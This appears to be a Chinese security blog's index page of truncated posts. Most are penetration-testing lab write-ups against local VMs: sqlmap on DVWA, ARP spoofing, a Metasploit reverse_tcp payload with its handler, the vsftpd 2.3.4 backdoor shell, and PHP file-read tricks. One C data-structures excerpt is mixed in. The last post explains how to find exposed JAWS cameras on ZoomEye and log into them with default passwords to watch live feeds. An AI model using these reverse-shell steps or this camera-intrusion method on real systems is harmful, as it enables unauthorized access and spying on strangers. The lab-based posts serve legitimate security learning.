网络渗透实验三
网络渗透实验三sqlmap的简单使用实战目标实战1:枚举登录MYSQL数据的用户名与密码
实战2:枚举所有数据库
实战3:枚举指定数据库的数据表
实战4:获取指定数据库和表中所有列的信息
实战5:枚举指定数据表中的所有用户名与密码
实验环境kali(sqlmap)
metasplitable2-Linux(DVWA)
实验开始用kali浏览器打开metasplitable2-Linux的DVWA靶场(admin/password)
把等级调为最低–low
然后点击sql注入的对应模块
随便输入一个数字,发现url发生变化
注入点是在登录后的页面的,所以使用sqlmap还需要获取cookie
按下F12点击console,输入document.cookie得到cookie
sqlmap的基语法参数:
-u :指定目标URL,即注入点
–cookies:当前会话的cookies值
-b:获取数据库类型,检索数据库管理系统标识
–current-db:获取当前数据库
–current-user:获取当前登录数据库使用的用户
其他命令参数看这里
打开终端,输入下面的命令
...
线性表
线性表的基本操作顺序表定义
typedef int DataType;
struct List
{
int Max;//最大元素个数
int n;//实际元素个数
DataType *elem;//首地址
};
typedef struct List *SeqList;//顺序表类型定义
顺序表遍历
void Print(SeqList slist)
{
int i;
for(i=0;i<slist->n;i++)
printf("%d\n",slist->elem[i]);
}
创建空顺序表
SeqList SetNullList_Seq(int m)//m为顺序表最大值
{
SeqList slist=(SeqList)malloc(sizeof(struct List)*m);//申请结构体空间
if(slist!=NULL)
{
slist->elem=(DataType *) ...
网络渗透实验二
网络渗透实验二实验目的:1、通过使用Wireshark软件掌握Sniffer(嗅探器)工具的使用方法,实现捕捉HTTP等协议的数据包,以理解TCP/IP协议中多种协议的数据结构、通过实验了解HTTP等协议明文传输的特性。
2、研究交换环境下的网络嗅探实现及防范方法,研究并利用ARP协议的安全漏洞,通过Arpspoof实现ARP欺骗以捕获内网其他用户数据。
3、能利用BrupSuite实现网站登录暴力破解获得登录密码。
4、能实现ZIP密码破解,理解安全密码的概念和设置。
系统环境:Kali Linux 2、Windows
网络环境:交换网络结构
实验工具:Arpspoof
WireShark
BurpSuite
fcrackzip
以上工具kali有
实验步骤和内容:网络嗅探部分:网络嗅探:Wireshark 监听网络流量,抓包。
ARP欺骗: ArpSpoof,实施ARP欺骗。
防范: 防范arp欺骗。
1、A主机上外网,B运行sinffer(Wireshark)选定只抓源为A的数据)。
1.1 写出以上过滤语句。
1.2 B是否能看到A和外网的通信(A刚输 ...
dedecms5.7 sp2前台修改任意用户密码漏洞复现
dedecms5.7 sp2前台修改任意用户密码漏洞复现
复现前的准备下载dedecms5.7 sp2,本人复现用的是UTF8版本的。
传送门
工具phpstudyburp Suite
复现过程首先在本地搭建这个cms,使用phpstudy
把解压后的文件丢进phpstudy的www目录下,可改一下文件夹名,这里改成了dedecms
根据文件下的docs/readme.txt的要求配置环境,然后打开服务,根据提示进行安装
安装事需要到数据库,直接在phpstudy创建
安装成功后进入后台/dedecms/uploads/dede/index.php,进行如下设置
然后访问/dedecms/uploads/member/index.php点击注册
这里注册两个账号(不要设置安全问题)
受害用户 text/123456
攻击者 hacher/123456
站在攻击者的角度,攻击者是不知道受害用户的密码的,现在的目的是登录受害用户的账号
现在先登录攻击者账号再将UR ...
网络渗透实验一
网络渗透实验一实验目的
理解网络扫描、网络侦察的作用;通过搭建网络渗透测试平台,了解并熟悉常用搜索引擎、扫描工具的应用,通过信息收集为下一步渗透工作打下基础。
实验环境
Kali Linux 2
Windows
网络环境
交换网络结构
实验工具
Metasploitable2(需自行下载虚拟机镜像);Nmap(Kali);WinHex、数据恢复软件等
实验步骤
1、用搜索引擎Google或百度搜索麻省理工学院网站中文件名包含“network security”的pdf文档,截图搜索得到的页面。
谷歌搜索输入:
"network security" filetype:pdf site:www.mit.edu
2、照片中的女生在哪里旅行?
截图搜索到的地址信息。
用谷歌地球搜索图中关键词:LeTrentehuit Cafe Brasserie
*
3、手机位置定位。通过LAC(Location Area Code,位置区域码)和CID(Cell Identity,基站编号,是个16位的数据(范围是0到65535)可以查询手机接入的基站 ...
花式读取文件
花式读取文件读文件hightlight_file($filename);
show_source($filename);
print_r(php_strip_whitespace($filename));
print_r(file_get_contents($filename));
readfile($filename);
print_r(file($filename)); // var_dump
fread(fopen($filename,”r”), $size);
include($filename); // 非php代码
include_once($filename); // 非php代码
require($filename); // 非php代码
require_once($filename); // 非php代码
print_r(fread(popen(“cat flag”, “r”), $size));
print_r(fgets(fopen($filename, “r”)) ...
Metasploit的简单应用
Metasploit的简单应用1、生成主控端、被控端。2、获得靶机(Windows)控制权。3、下载靶机上任意一个文件。
工具靶机: 关闭了windows安全中心的win10,ip: 192.168.118.132
攻击机:kali ip:192.168.118.128
开搞生成被控端
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.118.128 LPORT=5000 -f exe > /root/payload.exe
#LHOST=kali的ip
#LPORT=端口
将生成的payload.exe丢进靶机里面
回到kali
运行msfconsole
执行以下命令
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
执行 show options查看配置
发现LHOST和LPORT还没设置
执行
set lhost 192.168.118.128
set lport 5000
LHOST和LPORT ...
easy file sharing server漏洞复现
easy file sharing server漏洞复现一、漏洞详情Easy File Sharing FTP Server是一款FTP服务程序。 Easy File Sharing FTP Server处理PASS命令存在问题,远程攻击者可以利用漏洞进行缓冲区溢出攻击,可能以进程权限执行任意指令。 提交超长字符串作为PASS命令参数,可导致触发缓冲区溢出,精心构建提交数据可能以进程权限执行任意指令。
二、工具靶机: 192.168.118.132、win10(可用其他win系统,把windows安全中心关闭)、安装easy file sharing server
攻击机:192.168.118.128、kali
三、开始复现靶机打开easy file sharing server,把端口改为8000,然后点击restart
在kali用nmap扫描
nmap -sV 192.168.118.0/24
可以发现主机192.168.118.132(靶机)已经在8000端口打开了Easy File Sharing 服务
在kali使用searchsploit工具查找相应的渗透模块 ...
漏洞复现(vsftpd 2.3.4)
漏洞复现(vsftpd 2.3.4)工具:攻击机:kali: 192.168.118.128
靶机:Metasplotable2-Linux: 192.168.118.131
开始复现打开kali终端,执行以下命令
nmap 192.168.118.0/24
发现靶机(192.168.118.131)打开着21端口
nmap -sV 192.168.118.131
这里可以看到靶机的ftp服务的版本信息是vsftpd 2.3.4,漏洞就在这里
ftp 192.168.118.131 21
用户名 root:)//':)'是触发条件
密码: sssss //密码可乱来
执行以上命令后发现靶机打开了6200端口,这就是个后门
然后直接连接这个端口
nc 192.168.118.131 6200
成功连接,后门建立了shell,可以开始执行命令
复现结束
zoomeye抓取摄像头
zoomeye抓取摄像头一、打开zoomeye,在搜索框搜索搜索关键词“JAWS”
二、寻找摄像头,点击图中所画的圈内的黑点进入
尝试弱口令(默认口令)
用户名:admin
密码:空
接下来就是一个个尝试了
三、登录成功后,若出现以下情况,就点击“here”下载安装flash
下载并安装成功后,将url复制到flash的搜索框内,点击搜索
然后就能看到摄像头的画面了